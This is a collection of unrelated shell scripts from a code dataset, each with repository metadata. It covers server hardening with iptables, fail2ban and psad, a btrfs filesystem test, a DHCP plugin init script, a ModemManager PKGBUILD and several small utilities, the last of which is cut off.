#!/bin/bash
#If possible, add something in for choosing [1] Configure Basics [2] Configure Security [3] Configure VMware Tools [4] Configure All. This might require Perl.
#set -x
# Pause so the operator can read the warning and Ctrl-C out before the script
# starts replacing system configuration files.
read -p "RUN AS SUDO This script will perform basic configuration, as well as security configuration. Please connect VMware Tools image to include in installation. THIS SCRIPT WILL REPLACE A LOT OF IMPORTANT FILES. Seriously. Run this only on new systems. Press [ENTER] to continue or ^C to exit."
#read -p "Configure this server to be on 50.247.195.80/28?" yn
#while true; do
#case $yn in
# [Yy]* )
# echo "What IP address will be assigned to this server?"
# read ADDRESS
# cat <<EOF > /etc/network/interfaces
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).
#
# The loopback network interface
#auto lo
#iface lo inet loopback
#
# The primary network interface
#auto eth0
#iface eth0 inet static
#address $ADDRESS
#netmask 255.255.255.240
#gateway 50.247.195.94
#dns-nameservers 8.8.8.8 8.8.4.4
#EOF
# break;;
# [Nn]* ) break;;
# * ) echo "Please answer [y]es or [n]o." ;;
#esac
#done
# Update apt-get and upgrade any installed packages
apt-get update && apt-get -y dist-upgrade
# Install NTP, OpenSSH, Fail2Ban, PSAD
# Preseed the postfix mailer-type debconf question so the install below can
# run non-interactively.
debconf-set-selections <<< "postfix postfix/main_mailer_type select No configuration"
apt-get install -y ntp openssh-server fail2ban psad
# Disable root login on SSH and decrease grace time
# NOTE(review): these 'c\' seds replace whole matching lines; if a directive
# is absent from sshd_config nothing is changed — confirm on target distro.
sed -i '/LoginGraceTime/ c\LoginGraceTime 60' /etc/ssh/sshd_config
sed -i '/PermitRootLogin/ c\PermitRootLogin no' /etc/ssh/sshd_config
sed -i '/StrictModes/ c\StrictModes yes' /etc/ssh/sshd_config
service ssh restart
# Disable IPv6
# Appended verbatim to sysctl.conf; takes effect on next 'sysctl -p'/reboot.
cat <<END >> /etc/sysctl.conf
net.ipv6.conf.all.disable_ipv6 = 1
net.ipv6.conf.default.disable_ipv6 = 1
net.ipv6.conf.lo.disable_ipv6 = 1
END
# Log martians, deny ICMP routing
# Same caveat as above: 'c\' only rewrites lines that already exist.
sed -i '/net.ipv4.conf.all.log_martians/ c\net.ipv4.conf.all.log_martians = 1' /etc/sysctl.conf
sed -i '/net.ipv4.conf.all.accept_source_route/ c\net.ipv4.conf.all.accept_source_route = 0' /etc/sysctl.conf
sed -i '/net.ipv4.conf.all.send_redirects/ c\net.ipv4.conf.all.send_redirects = 0' /etc/sysctl.conf
sed -i '/net.ipv4.conf.all.accept_redirects/ c\net.ipv4.conf.all.accept_redirects = 0' /etc/sysctl.conf
# Configure the firewall
# Default-deny inbound policy: allow established/related traffic, SSH (22)
# and HTTP (80); loopback is inserted first so it always matches.
iptables -F
iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
iptables -A INPUT -p tcp --dport 22 -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -j ACCEPT
#iptables -A INPUT -p tcp --dport 8080 -j ACCEPT
iptables -I INPUT 1 -i lo -j ACCEPT
iptables -P INPUT DROP
# Log whatever falls through (and all forwarded traffic).
iptables -A INPUT -j LOG
iptables -A FORWARD -j LOG
# Preseed iptables-persistent so installing it saves the rules just loaded.
echo iptables-persistent iptables-persistent/autosave_v4 boolean true | debconf-set-selections
echo iptables-persistent iptables-persistent/autosave_v6 boolean true | debconf-set-selections
apt-get install -y iptables-persistent
# Fail2Ban Configuration
cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local
# NOTE(review): these line-number-addressed seds (21s/22s/23s/24s/99s) are
# tied to the exact stock jail.conf layout of one fail2ban version; they
# will silently edit the wrong lines on other versions — confirm.
sed -i '21s/.*/ignoreip = 127.0.0.1\/8 192.168.0.0\/16 50.247.195.80\/28/' /etc/fail2ban/jail.local
sed -i '22s/600/1800/' /etc/fail2ban/jail.local
sed -i '23s/.*/maxretry = 5/' /etc/fail2ban/jail.local
sed -i '24s/.*/findtime = 1200/' /etc/fail2ban/jail.local
sed -i '99s/6/5/' /etc/fail2ban/jail.local
# Append a long-term "repeat offender" SSH jail (one-year findtime/bantime).
# The FIN delimiter is unquoted, but the body contains no shell expansions.
cat <<FIN >> /etc/fail2ban/jail.local
[ssh-repeater]
enabled = true
port = ssh
filter = sshd
action = iptables-repeater[name=ssh]
sendmail-whois[name=SSH-repeater, dest=root, sender=root]
logpath = /var/log/auth.log
maxretry = 25
findtime = 31536000
bantime = 31536000
# This section is needed if wp-fail2ban is installed as a plugin on Wordpress
#[wordpress-auth-repeater]
#enabled = true
#port = http,https
#filter = wordpress
#action = iptables-repeater[name=wordpress]
# sendmail-whois[name=wordpress-repeater, dest=root, sender=root]
#logpath = /var/log/auth.log
#maxretry = 35
#findtime = 31536000
#bantime = 31536000
FIN
# Install the custom 'iptables-repeater' fail2ban action referenced by the
# jail above. The heredoc delimiter is quoted ("endOFfile"), so the body is
# written out literally with no shell expansion; the %% sequences are
# fail2ban's own escaping for '%'.
touch /etc/fail2ban/action.d/iptables-repeater.conf
cat <<"endOFfile" > /etc/fail2ban/action.d/iptables-repeater.conf
# Fail2ban configuration file
#
# Author: Phil Hagen <phil@identityvector.com>
#
[Definition]
# Option: actionstart
# Notes.: command executed once at the start of Fail2Ban.
# Values: CMD
#
actionstart = iptables -N fail2ban-REPEAT-<name>
iptables -A fail2ban-REPEAT-<name> -j RETURN
iptables -I INPUT -j fail2ban-REPEAT-<name>
# set up from the static file
cat /etc/fail2ban/ip.blocklist.<name> |grep -v ^\s*#|awk '{print $1}' | while read IP; do iptables -I fail2ban-REPEAT-<name> 1 -s $IP -j DROP; done
# Option: actionstop
# Notes.: command executed once at the end of Fail2Ban
# Values: CMD
#
actionstop = iptables -D INPUT -j fail2ban-REPEAT-<name>
iptables -F fail2ban-REPEAT-<name>
iptables -X fail2ban-REPEAT-<name>
# Option: actioncheck
# Notes.: command executed once before each actionban command
# Values: CMD
#
actioncheck = iptables -n -L INPUT | grep -q fail2ban-REPEAT-<name>
# Option: actionban
# Notes.: command executed when banning an IP. Take care that the
# command is executed with Fail2Ban user rights.
# Tags: <ip> IP address
# <failures> number of failures
# <time> unix timestamp of the ban time
# Values: CMD
#
actionban = iptables -I fail2ban-REPEAT-<name> 1 -s <ip> -j DROP
# also put into the static file to re-populate after a restart
! grep -Fq <ip> /etc/fail2ban/ip.blocklist.<name> && echo "<ip> # fail2ban/$( date '+%%Y-%%m-%%d %%T' ): auto-add for repeat offender" >> /etc/fail2ban/ip.blocklist.<name>
# Option: actionunban
# Notes.: command executed when unbanning an IP. Take care that the
# command is executed with Fail2Ban user rights.
# Tags: <ip> IP address
# <failures> number of failures
# <time> unix timestamp of the ban time
# Values: CMD
#
actionunban = /bin/true
[Init]
# Defaut name of the chain
#
name = REPEAT
endOFfile
# Activate the new jail/action.
service fail2ban restart
# PSAD Configuration
# Keep a pristine copy, then point psad at this host/network and the
# syslog-style log file used on Debian/Ubuntu.
cp /etc/psad/psad.conf /etc/psad/psad.conf.orig
sed -i "s/_CHANGEME_;/${HOSTNAME};/" /etc/psad/psad.conf
sed -i 's/HOME_NET any;/HOME_NET 50.247.195.80\/28;/' /etc/psad/psad.conf
sed -i 's/var\/log\/messages/var\/log\/syslog/' /etc/psad/psad.conf
# Enable automatic blocking once danger level 4 is reached.
sed -i '/ENABLE_AUTO_IDS N;/ c\ENABLE_AUTO_IDS Y;' /etc/psad/psad.conf
sed -i '/AUTO_IDS_DANGER_LEVEL/ c\AUTO_IDS_DANGER_LEVEL 4;' /etc/psad/psad.conf
# Whitelist loopback and the local /28 (danger level 0 = never flag).
echo '127.0.0.0/8 0;' >> /etc/psad/auto_dl
echo '50.247.195.80/28 0;' >> /etc/psad/auto_dl
psad --sig-update
service psad restart
# Add psad sig-update to weekly root crontab
# Fixes: use mktemp instead of a predictable /tmp name, and tolerate an
# empty crontab ('crontab -l' exits non-zero and prints to stderr when the
# user has no crontab yet).
CRONTMP=$(mktemp) || exit 1
crontab -l 2>/dev/null > "$CRONTMP"
echo '00 06 * * 1 psad --sig-update' >> "$CRONTMP"
crontab "$CRONTMP"
rm -f "$CRONTMP"
# VMware Tools install
# -p makes the mount point creation idempotent on re-runs.
mkdir -p /mnt/cdrom
mount /dev/cdrom /mnt/cdrom
# Resolve the tarball with shell globbing instead of parsing 'ls' output
# (the original broke on unusual names and spawned a useless process).
VMWT=(/mnt/cdrom/VMwareTools*)
tar xzvf "${VMWT[0]}" -C /tmp/
/tmp/vmware-tools-distrib/vmware-install.pl -d
# Reminder to install VMware Tools
echo "Remember to install VMware Tools if you didn't!"
exit 0
| true
|
351fd65bdd0c566dd6fe6240a9deb709fb5ba665
|
Shell
|
kdave/xfstests
|
/tests/btrfs/216
|
UTF-8
| 1,182
| 3.046875
| 3
|
[] |
no_license
|
#! /bin/bash
# SPDX-License-Identifier: GPL-2.0
# Copyright (c) 2020 Oracle. All Rights Reserved.
#
# FS QA Test 216
#
# Test if the show_devname() returns sprout device instead of seed device.
#
# Fixed in kernel patch:
# btrfs: btrfs_show_devname don't traverse into the seed fsid
. ./common/preamble
_begin_fstest auto quick seed
# Import common functions.
. ./common/filter
# real QA test starts here
_supported_fs btrfs
_require_scratch_dev_pool 2
_scratch_dev_pool_get 2
# First pool device becomes the seed fs, second is added as the sprout.
seed=$(echo $SCRATCH_DEV_POOL | $AWK_PROG '{print $1}')
sprout=$(echo $SCRATCH_DEV_POOL | $AWK_PROG '{print $2}')
_mkfs_dev $seed
# Mark the filesystem as a seed (btrfstune -S 1) before mounting it.
$BTRFS_TUNE_PROG -S 1 $seed
_mount $seed $SCRATCH_MNT >> $seqres.full 2>&1
cat /proc/self/mounts | grep $seed >> $seqres.full
# Adding a writable device to a mounted seed fs creates the sprout.
$BTRFS_UTIL_PROG device add -f $sprout $SCRATCH_MNT >> $seqres.full
cat /proc/self/mounts | grep $sprout >> $seqres.full
# check if the show_devname() returns the sprout device instead of seed device.
dev=$(grep $SCRATCH_MNT /proc/self/mounts | $AWK_PROG '{print $1}')
if [ "$sprout" != "$dev" ]; then
echo "Unexpected device: $dev, expected $sprout"
fi
echo "Silence is golden"
_scratch_dev_pool_put
# success, all done
status=0
exit
| true
|
0f98a1d7cf64bbd05751dc256053aad554a376d2
|
Shell
|
Zlatov/lab
|
/bash/sql_to_file/select_result_to_text.sh
|
UTF-8
| 916
| 3.296875
| 3
|
[] |
no_license
|
#!/bin/bash
# Run 1.sql and 2.sql against the configured MySQL database.
# Query 1's raw result goes to 1.html; query 2's post ids are rendered as
# forum links into 2.html.
# Load the local config (DB credentials) if present and export the password
# so mysql does not prompt for it; abort otherwise.
if [ -f ./config.sh ]
then
  . "./config.sh"
  export MYSQL_PWD="$DBPASS"
else
  echo 'Локальный конфиг не найден'
  exit 1
fi
if [ ! -f ./1.sql ]
then
  echo Файл 1.sql не найден
else
  # Bug fix: this branch used to test/truncate 2.html (copy-paste from the
  # block below), wiping query 2's output whenever query 1 ran. Clear its
  # own output file instead.
  if [ -f ./1.html ]
  then
    > 1.html
  fi
  mysql --host="$DBHOST" --port=3306 --user="$DBUSER" --database="$DBNAME" -s < "./1.sql" > '1.html'
fi
if [ ! -f ./2.sql ]
then
  echo Файл 2.sql не найден
else
  if [ -f ./2.html ]
  then
    > 2.html
  fi
  # -r keeps backslashes in the id column literal.
  mysql --host="$DBHOST" --port=3306 --user="$DBUSER" --database="$DBNAME" -s < "./2.sql" | while read -r post_id ex; do
    echo "id: $post_id"
    echo "<a href=\"https://sign-forum.ru/viewtopic.php?p=$post_id#p$post_id\">$post_id</a>" >> '2.html'
  done
fi
| true
|
f748589935ee6251f592c1897d3ac6818271eb25
|
Shell
|
aastaneh/loghist
|
/loghist
|
UTF-8
| 1,678
| 3.96875
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
#
# Name: loghist
#
# Purpose: a cli histogram generator for real-time log changes
#
# Author: Amin Astaneh (amin@aminastaneh.net)
#
# License Information
#
# Copyright (C) 2012
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# BEGIN FUNCTIONS
tohist() {
  # Render one histogram row: "<timestamp> | <count> \t<bar of '='>".
  # Bug fix: the original time format used %m (month) for the minutes
  # field; %M is minutes.
  local count=$1
  local now
  now=$(date "+%Y/%m/%d %H:%M:%S")
  printf '%s | %s \t' "$now" "$count"
  # One '=' per counted match; still no scaling to the terminal width.
  local i
  for (( i = 0; i < count; i++ )); do printf '='; done
  printf '\n'
}
# END FUNCTIONS
FILE=$1
DURATION=$2
EXPRESSION=$3
# Require exactly three arguments before entering the sampling loop.
if [ "$#" -ne "3" ]; then
    echo "Usage: $0 file seconds expression"
    echo "    file: logfile to generate histogram from"
    echo "    seconds: number of seconds between samples"
    echo "    expression: uses grep"
    exit 1
fi
# Sample forever: every $DURATION seconds, count new matching lines and
# print one histogram row for them.
while true; do
    tohist $(
        # Clever hack - tails a file for a specified time, in seconds.
        # Quote the filename (was unquoted) and use SIGTERM rather than
        # SIGKILL — tail exits cleanly on TERM.
        (tail -n0 -f "$FILE" & P=$! ; sleep "$DURATION"; kill "$P") |
        grep -c -- "$EXPRESSION"
    );
done
| true
|
e37953fe11cc541005eee7efeec5dd5a67f32324
|
Shell
|
yozot/utils
|
/xtermtitle
|
UTF-8
| 451
| 3.609375
| 4
|
[] |
no_license
|
#!/bin/sh
## $Id: xtermtitle,v 1.1 2002/12/05 17:04:16 yozo Exp $
## xtermtitle: set xterm icon and window title string using escape string.
## see ${X11}/xc/doc/specs/xterm/ctlseqs.ms
## -- yozo. Thu Sep 2 17:32:49 JST 1999
PATH=/usr/bin
## printf is built-in function of csh.
if [ $# -eq 1 ]; then
  string=$1
  # Fix: pass the title as a printf *argument*, not inside the format
  # string, so titles containing '%' or backslashes are emitted literally.
  printf '\033]0;%s\007' "$string"
  exit 0
else
  printf '%s: set xterm icon and window title string.\n' "$0"
  printf 'usage: %s string\n' "$0"
fi
| true
|
4de2cc28a81fe20b99e33b369affa33e74d8a23f
|
Shell
|
igorecarrasco/covidbot
|
/bin/deploy.sh
|
UTF-8
| 653
| 2.59375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
##################################################
##################################################
#  Deployment for cloud function - Covid19Bot    #
##################################################
##################################################
PROJECT=impostobot
# Freeze the pipenv lockfile into a requirements.txt the function runtime
# understands; abort on failure so we never deploy stale requirements.
pipenv lock -r > ./covidbot/requirements.txt || exit 1
# Fix: if the source directory is missing, bail out instead of deploying
# whatever happens to be in the current directory.
cd covidbot || exit 1 # Move to the folder with the scripts and necessary files
# Now we do the actual deploy.
gcloud functions deploy covid19bot \
   --region us-central1 \
   --env-vars-file=keys.yaml \
   --runtime python37 \
   --trigger-http \
   --entry-point main \
   --memory 256MB \
   --project "$PROJECT"
cd ..
| true
|
0148dc2cf731f9d36de96899adc5b98d62077dc2
|
Shell
|
thohal/openqrm
|
/trunk/src/plugins/dhcpd/etc/init.d/openqrm-plugin-dhcpd
|
UTF-8
| 7,096
| 3.46875
| 3
|
[] |
no_license
|
#!/bin/bash
# init script for the openQRM dhcpd plugin
#
# This file is part of openQRM.
#
# openQRM is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# as published by the Free Software Foundation.
#
# openQRM is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with openQRM. If not, see <http://www.gnu.org/licenses/>.
#
# Copyright 2009, Matthias Rechenburg <matt@openqrm.com>
#
OPENQRM_SERVER_BASE_DIR=$(pushd $(dirname $0)/../../../../.. > /dev/null; echo $PWD; popd > /dev/null)
. $OPENQRM_SERVER_BASE_DIR/openqrm/etc/openqrm-server.conf
. $OPENQRM_SERVER_BASE_DIR/openqrm/include/openqrm-functions
. $OPENQRM_SERVER_BASE_DIR/openqrm/include/openqrm-server-functions
. $OPENQRM_SERVER_BASE_DIR/openqrm/plugins/dhcpd/include/openqrm-plugin-dhcpd-functions
. $OPENQRM_SERVER_BASE_DIR/openqrm/plugins/dhcpd/etc/openqrm-plugin-dhcpd.conf
# Start the plugin's dhcpd using the plugin-local config; prefers the
# Debian/Ubuntu 'dhcpd3' binary and falls back to 'dhcpd'. Drops a
# .running marker consumed by the openQRM web frontend.
function openqrm_plugin_dhcpd_start() {
echo "Starting the openQRM dhcpd-plugin"
# Make sure no stale instance is left before starting a new one.
openqrm_plugin_dhcpd_stop 1>/dev/null 2>&1
# on debian/ubuntu dhcpd ver.3 is named dhcpd3
if [ -x /usr/sbin/dhcpd3 ]; then
# fix for ubuntu jaunty which does not like the leass file in the plugin dir
# NOTE(review): this first invocation both starts dhcpd3 and probes whether
# the plugin-local lease file is usable; on failure it retries without -lf
# so the distribution's default lease path is used instead.
if ! /usr/sbin/dhcpd3 -cf $OPENQRM_PLUGIN_DHCPD_CONF -lf $OPENQRM_PLUGIN_DHCPD_LEASE_DIR/dhcpd.leases 2>&1; then
/usr/sbin/dhcpd3 -cf $OPENQRM_PLUGIN_DHCPD_CONF 2>&1
RET=$?
else
RET=0
fi
elif [ -x /usr/sbin/dhcpd ]; then
/usr/sbin/dhcpd -cf $OPENQRM_PLUGIN_DHCPD_CONF -lf $OPENQRM_PLUGIN_DHCPD_LEASE_DIR/dhcpd.leases 2>&1
RET=$?
else
echo "ERROR: Could not find the dhcpd (ver.3) binary"
exit 1
fi
# Marker file that tells the web UI the plugin is running.
touch $OPENQRM_WEBSERVER_DOCUMENT_ROOT/openqrm/base/plugins/dhcpd/.running
return $RET
}
# Stop any running dhcpd/dhcpd3 instance (output discarded; the processes
# may not exist) and remove the web-UI run marker. Always returns 0.
function openqrm_plugin_dhcpd_stop() {
echo "Stopping the openQRM dhcpd-plugin"
for dhcp_daemon in dhcpd dhcpd3; do
killall $dhcp_daemon 1>/dev/null 2>&1
done
rm -f $OPENQRM_WEBSERVER_DOCUMENT_ROOT/openqrm/base/plugins/dhcpd/.running
return 0
}
# One-time plugin initialization: creates the lease dir, derives sensible
# DHCP defaults from the server's network config, renders dhcpd.conf from
# the template, whitelists the plugin paths in AppArmor, and links the
# plugin web UI into the document root.
function openqrm_plugin_dhcpd_init() {
echo "Initializing the openQRM dhcpd-plugin"
openqrm_server_get_config
# create leases dir
mkdir -p $OPENQRM_PLUGIN_DHCPD_LEASE_DIR
touch $OPENQRM_PLUGIN_DHCPD_LEASE_DIR/dhcpd.leases
chmod -R 777 $OPENQRM_PLUGIN_DHCPD_LEASE_DIR
# calculate the defaults
# DHCP range: network address + 1 .. broadcast address - 1.
OPENQRM_SERVER_NETWORK=`openqrm_plugin_dhcpd_get_netaddr $OPENQRM_SERVER_IP_ADDRESS $OPENQRM_SERVER_SUBNET_MASK`
IP1=`echo $OPENQRM_SERVER_NETWORK | cut -d'.' -f 1-3`
IP2=`echo $OPENQRM_SERVER_NETWORK | cut -d'.' -f 4`
IP2=$(( IP2 + 1 ))
OPENQRM_PLUGIN_DHCPD_IP_RANGE_FIRST="$IP1.$IP2"
IP1=`echo $OPENQRM_SERVER_BROADCAST_ADDRESS | cut -d'.' -f 1-3`
IP2=`echo $OPENQRM_SERVER_BROADCAST_ADDRESS | cut -d'.' -f 4`
IP2=$(( IP2 - 1 ))
OPENQRM_PLUGIN_DHCPD_IP_RANGE_LAST="$IP1.$IP2"
# Best-effort discovery of DNS, default gateway and search domain.
OPENQRM_SERVER_DNS=`cat /etc/resolv.conf | grep -m 1 "nameserver" | awk {' print $2 '} | head -n1 2>/dev/null`
OPENQRM_SERVER_DEFAULT_GATEWAY=`route -n | grep '^0.0.0.0' | grep $OPENQRM_SERVER_INTERFACE | awk {' print $2 '} | head -n1 2>/dev/null`
OPENQRM_SERVER_DOMAIN=`cat /etc/resolv.conf | grep -m 1 "search" | awk '{print $2'} | head -n1 2>/dev/null`
# make sure we have got values to put in the dhcpd.conf
# Fall back to the server's own IP when discovery came up empty.
# NOTE(review): the inner validate-ip branches re-assign the same fallback
# value they just set, so they are effectively no-ops — confirm intent.
if [ "$OPENQRM_SERVER_DEFAULT_GATEWAY" == "" ]; then
OPENQRM_SERVER_DEFAULT_GATEWAY=$OPENQRM_SERVER_IP_ADDRESS
if ! openqrm_validate_ip $OPENQRM_SERVER_DEFAULT_GATEWAY; then
OPENQRM_SERVER_DEFAULT_GATEWAY=$OPENQRM_SERVER_IP_ADDRESS
fi
fi
if [ "$OPENQRM_SERVER_DNS" == "" ]; then
OPENQRM_SERVER_DNS=$OPENQRM_SERVER_IP_ADDRESS
if ! openqrm_validate_ip $OPENQRM_SERVER_DNS; then
OPENQRM_SERVER_DNS=$OPENQRM_SERVER_IP_ADDRESS
fi
fi
if [ "$OPENQRM_SERVER_DOMAIN" == "" ]; then
OPENQRM_SERVER_DOMAIN=$OPENQRM_SERVER_DEFAULT_DOMAIN
fi
# create default dhcpd configuration
# Substitute every placeholder token in the template.
# NOTE(review): the SUBNET_MASK sed appears twice; the duplicate is a
# harmless no-op.
cat $OPENQRM_PLUGIN_DHCPD_CONF_TEMPLATE | \
sed -e "s/OPENQRM_SERVER_SUBNET_MASK/$OPENQRM_SERVER_SUBNET_MASK/g" | \
sed -e "s/OPENQRM_SERVER_SUBNET_MASK/$OPENQRM_SERVER_SUBNET_MASK/g" | \
sed -e "s/OPENQRM_SERVER_BROADCAST_ADDRESS/$OPENQRM_SERVER_BROADCAST_ADDRESS/g" | \
sed -e "s/OPENQRM_SERVER_DEFAULT_GATEWAY/$OPENQRM_SERVER_DEFAULT_GATEWAY/g" | \
sed -e "s/OPENQRM_SERVER_DOMAIN/$OPENQRM_SERVER_DOMAIN/g" | \
sed -e "s/OPENQRM_SERVER_DNS/$OPENQRM_SERVER_DNS/g" | \
sed -e "s/OPENQRM_SERVER_IP_ADDRESS/$OPENQRM_SERVER_IP_ADDRESS/g" | \
sed -e "s/OPENQRM_SERVER_NETWORK/$OPENQRM_SERVER_NETWORK/g" | \
sed -e "s/OPENQRM_PLUGIN_DHCPD_IP_RANGE_FIRST/$OPENQRM_PLUGIN_DHCPD_IP_RANGE_FIRST/g" | \
sed -e "s/OPENQRM_PLUGIN_DHCPD_IP_RANGE_LAST/$OPENQRM_PLUGIN_DHCPD_IP_RANGE_LAST/g" \
> $OPENQRM_PLUGIN_DHCPD_CONF
# enable apparmor if needed
# Append rw rules for the plugin dirs inside the profile's closing brace,
# once, then reload AppArmor so dhcpd3 may touch our config/lease files.
if [ -f /etc/apparmor.d/usr.sbin.dhcpd3 ]; then
if ! grep openQRM /etc/apparmor.d/usr.sbin.dhcpd3 1>/dev/null; then
cat /etc/apparmor.d/usr.sbin.dhcpd3 |
sed -i -e "s#}##g" /etc/apparmor.d/usr.sbin.dhcpd3
echo " # openQRM" >> /etc/apparmor.d/usr.sbin.dhcpd3
echo " $OPENQRM_SERVER_BASE_DIR/openqrm/plugins/dhcpd/** rw," >> /etc/apparmor.d/usr.sbin.dhcpd3
if [ -d /etc/openqrm/plugins/dhcpd/ ]; then
echo " /etc/openqrm/plugins/dhcpd/** rw," >> /etc/apparmor.d/usr.sbin.dhcpd3
fi
echo "}" >> /etc/apparmor.d/usr.sbin.dhcpd3
echo >> /etc/apparmor.d/usr.sbin.dhcpd3
if [ -x "/etc/init.d/apparmor" ]; then
if [ -x "`which invoke-rc.d 2>/dev/null`" ]; then
invoke-rc.d apparmor reload || exit $?
else
/etc/init.d/apparmor reload || exit $?
fi
fi
fi
fi
# linking the web dir
ln -sf $OPENQRM_SERVER_BASE_DIR/openqrm/plugins/dhcpd/web $OPENQRM_WEBSERVER_DOCUMENT_ROOT/openqrm/base/plugins/dhcpd
return 0
}
# Undo plugin setup: stop dhcpd, strip the openQRM lines from the AppArmor
# profile (reloading it), and remove the web-UI symlink.
function openqrm_plugin_dhcpd_uninstall() {
echo "Uninstalling the openQRM dhcpd-plugin"
openqrm_plugin_dhcpd_stop
# remove apparmor setup
# Blank out any line mentioning openQRM/openqrm that init() appended.
if [ -f /etc/apparmor.d/usr.sbin.dhcpd3 ]; then
sed -i -e "s#.*openQRM.*##g" /etc/apparmor.d/usr.sbin.dhcpd3
sed -i -e "s#.*openqrm.*##g" /etc/apparmor.d/usr.sbin.dhcpd3
if [ -x "/etc/init.d/apparmor" ]; then
if [ -x "`which invoke-rc.d 2>/dev/null`" ]; then
invoke-rc.d apparmor reload || exit $?
else
/etc/init.d/apparmor reload || exit $?
fi
fi
fi
# unlinking the web dir
rm -f $OPENQRM_WEBSERVER_DOCUMENT_ROOT/openqrm/base/plugins/dhcpd
}
case "$1" in
start)
openqrm_plugin_dhcpd_start
;;
stop)
openqrm_plugin_dhcpd_stop
;;
restart)
openqrm_plugin_dhcpd_stop
sleep 1
openqrm_plugin_dhcpd_start
;;
init)
openqrm_plugin_dhcpd_init
;;
uninstall)
openqrm_plugin_dhcpd_uninstall
;;
*)
echo "Usage: $0 {start|stop|restart|init|uninstall}"
exit 1
esac
exit $?
| true
|
cf7ae22fbf75db1dcfc28f093f174b623a3c9ff7
|
Shell
|
cha63506/core-3
|
/modemmanager/PKGBUILD
|
UTF-8
| 1,204
| 2.921875
| 3
|
[] |
no_license
|
# Arch PKGBUILD metadata for ModemManager.
pkgname=modemmanager
# Upstream tarball/dir name differs in case from the package name.
_realname=ModemManager
pkgver=1.4.10
pkgrel=1
pkgdesc="Mobile broadband modem management service"
arch=('x86_64')
url="http://www.freedesktop.org/wiki/Software/ModemManager/"
license=('GPL2' 'LGPL2.1')
depends=('systemd' 'libgudev' 'polkit' 'ppp' 'python2' 'libqmi' 'libmbim' 'hicolor-icon-theme')
makedepends=('intltool' 'gobject-introspection' 'vala')
# Upstream tarball plus a local patch applied in prepare().
source=("http://www.freedesktop.org/software/${_realname}/${_realname}-${pkgver}.tar.xz"
"bus-signals.patch")
optdepends=('usb-modeswitch: install if your modem shows up as a storage drive')
md5sums=('1e46a148e2af0e9f503660fcd2d8957d'
'02aac68b3ef2ec1971f05300760ba4e5')
prepare() {
  # Apply the bundled bus-signals patch on top of the unpacked sources.
  cd "${_realname}-${pkgver}"
  patch -Np1 -i ../bus-signals.patch
}
build() {
cd "$srcdir/${_realname}-${pkgver}"
# Standard system-prefix configure; permissive polkit, no static libs or
# gtk-doc.
./configure --prefix=/usr \
--sysconfdir=/etc \
--localstatedir=/var \
--with-udev-base-dir=/usr/lib/udev \
--with-polkit=permissive \
--disable-gtk-doc \
--disable-static
# https://bugzilla.gnome.org/show_bug.cgi?id=655517
# Work around libtool overlinking by injecting --as-needed.
sed -i -e 's/ -shared / -Wl,-O1,--as-needed\0/g' libtool
make
}
# Install the built tree into the package staging directory.
package() {
cd "$srcdir/${_realname}-${pkgver}"
make DESTDIR="$pkgdir" install
}
| true
|
b7d0ead489b199085d572dd1190eb6d74dbd0837
|
Shell
|
OddBloke/qa-scripts
|
/scripts/jenkins-get
|
UTF-8
| 2,607
| 4.4375
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
VERBOSITY=0
TEMP_D=""

# error: print all arguments to stderr.
error() {
    echo "$@" >&2
}

# fail: exit with the previous command's status (or 1 if it was 0),
# printing any message given.
fail() {
    local rc=$?
    if [ "$rc" -eq 0 ]; then
        rc=1
    fi
    failrc "$rc" "$@"
}

# failrc: exit with the given status, printing an optional message first.
failrc() {
    local rc=$1
    shift
    if [ $# -gt 0 ]; then
        error "$@"
    fi
    exit "$rc"
}
# Usage: print command help to stdout (used by -h/--help and bad_Usage).
Usage() {
cat <<EOF
Usage: ${0##*/} [ options ] build-url
Download Jenkins artifacts and console from build-url
Example:
* ${0##*/} https://jenkins/server/job/cloud-init-integration-a/175
creates curtin-vmtest-proposed-a-artifacts.tar.xz
EOF
}
# bad_Usage: emit usage on stderr plus an optional error message; returns 1.
bad_Usage() {
    Usage >&2
    if [ $# -ne 0 ]; then
        error "$@"
    fi
    return 1
}
# debug: print the remaining arguments to stderr when the current VERBOSITY
# is at least the level given as $1; silent (status 0) otherwise.
debug() {
    local lvl=$1
    shift
    if [ "$lvl" -le "$VERBOSITY" ]; then
        error "$@"
    fi
}
# cleanup: remove the temporary working directory, if one was created.
# Installed as an EXIT trap by main().
cleanup() {
    if [ -n "${TEMP_D}" ] && [ -d "${TEMP_D}" ]; then
        rm -Rf "${TEMP_D}"
    fi
}
# main: parse options, then download the console log and zipped artifacts
# for a Jenkins build URL, repack the artifacts as tar.xz, and leave both
# files in the current directory.
main() {
    local short_opts="hv"
    local long_opts="help,verbose"
    local getopt_out=""
    getopt_out=$(getopt --name "${0##*/}" \
        --options "${short_opts}" --long "${long_opts}" -- "$@") &&
        eval set -- "${getopt_out}" ||
        { bad_Usage; return; }

    local cur=""
    local url=""

    # NOTE(review): the original had a dead '-o|--output' case here that
    # getopt could never emit ("o:" was not in short_opts) and whose value
    # was never used; it and the unused 'next'/'t2' locals were removed.
    while [ $# -ne 0 ]; do
        cur="$1"
        case "$cur" in
            -h|--help) Usage ; exit 0;;
            -v|--verbose) VERBOSITY=$((VERBOSITY+1));;
            --) shift; break;;
        esac
        shift
    done

    [ $# -eq 1 ] || { bad_Usage "Expected 1 argument, got $# ($*)"; return; }
    url="$1"

    TEMP_D=$(mktemp -d "${TMPDIR:-/tmp}/${0##*/}.XXXXXX") ||
        fail "failed to make tempdir"
    trap cleanup EXIT

    url="${url%/}/"
